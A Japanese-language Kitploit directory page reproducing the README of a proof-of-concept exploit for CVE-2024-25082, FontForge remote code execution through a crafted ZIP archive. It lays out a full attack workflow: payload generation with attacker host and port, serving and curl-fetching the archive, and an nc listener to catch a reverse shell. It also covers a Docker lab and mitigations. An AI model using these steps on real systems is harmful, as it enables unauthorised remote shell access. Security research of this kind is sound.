Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25082 — CVE-2024-25082の概念実証エクスプロイトで、細工されたZIPアーカイブを介したFontForgeのリモートコード実行を示します。ペイロードジェネレータ、Dockerラボ、技術解説を含み、セキュリティ研究と教育に使用します。 | Kitploit
ツール/GitHubGitHub/moamenx8/cve-2024-25082
ペイロード生成脆弱性分析エクスプロイトペネトレーションテスト学習と教育リモートアクセスツール
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

CVE-2024-25082の概念実証エクスプロイトで、細工されたZIPアーカイブを介したFontForgeのリモートコード実行を示します。ペイロードジェネレータ、Dockerラボ、技術解説を含み、セキュリティ研究と教育に使用します。

リポジトリを見る
55ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚠️ CVE-2024-25082 - FontForge ZIP リモートコード実行 (PoC)

License Python CVE

CVE-2024-25082 の Proof-of-Concept エクスプロイト。FontForge に影響を与える脆弱性で、細工された ZIP アーカイブを介してリモートコード実行 (RCE) を可能にします。

このリポジトリは、セキュリティ研究および教育目的のために、管理されたラボ環境でこの脆弱性をどのように悪用できるかを示しています。


脆弱性の概要

  • CVE ID: CVE-2024-25082\
  • 影響を受けるソフトウェア: FontForge\
  • 脆弱性の種類: リモートコード実行\
  • 攻撃ベクトル: 悪意のある ZIP アーカイブ\
  • 影響: 細工されたアーカイブが処理されると任意のコマンド実行が可能

この脆弱性は、ZIP アーカイブ内のファイルの検証が不適切であるために発生し、攻撃者が標的のシステム上で任意のコマンドを実行できるようになります。


リポジトリ構成

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

File 説明


exploit.py 悪意のある ZIP ペイロードを生成します poc/ 生成された Proof-of-Concept ファイルを含みます writeup.md 脆弱性の技術的解説


要件

  • Python 3.x
  • Netcat

オプションツールをインストール:

root@kitploit:~
sudo apt install netcat

使用方法

1️⃣ 悪意のあるペイロードを生成

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

これにより、悪意のある exploit.zip ファイルが生成されます。


2️⃣ エクスプロイトを配信

root@kitploit:~
python3 -m http.server 8080

3️⃣ 標的システムからアップロード

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ リバースシェルを捕捉

root@kitploit:~
nc -lvnp <Your Port>

成功すると、標的システムからシェルを取得できます。


脆弱性の再現

再現可能な脆弱環境が docker/ ディレクトリ内に用意されています。

例:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

これにより、本番システムに影響を与えずに安全にテストできます。


セキュリティへの影響

脆弱なアプリケーションで処理される ZIP ファイルをアップロードまたは制御できる攻撃者は、以下を行う可能性があります:

  • 任意のシステムコマンドを実行
  • リモートシェルアクセスを取得
  • ホストシステムを危険にさらす

緩和策

推奨される緩和策:

  • FontForge をパッチ適用済みバージョンに更新する
  • アップロードされたアーカイブの内容を検証する
  • ファイルアップロード機能を制限する
  • フォント処理時にサンドボックスを使用する

免責事項

このリポジトリには、公開されている脆弱性に対する Proof-of-Concept コードが含まれています。

このコードは、以下の目的にのみ提供されています:

  • セキュリティ研究
  • 教育目的
  • 許可されたペネトレーションテスト

明示的な許可なしに、このコードをシステムに対して使用しないでください。

著者は、このソフトウェアによって引き起こされた誤用または損害について一切責任を負いません。


著者

Moamen Elmaghrabi

サイバーセキュリティ学生
ペネトレーションテスト & エクスプロイト開発


ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。
詳細については、LICENSE ファイルを参照してください。

ツールをダウンロード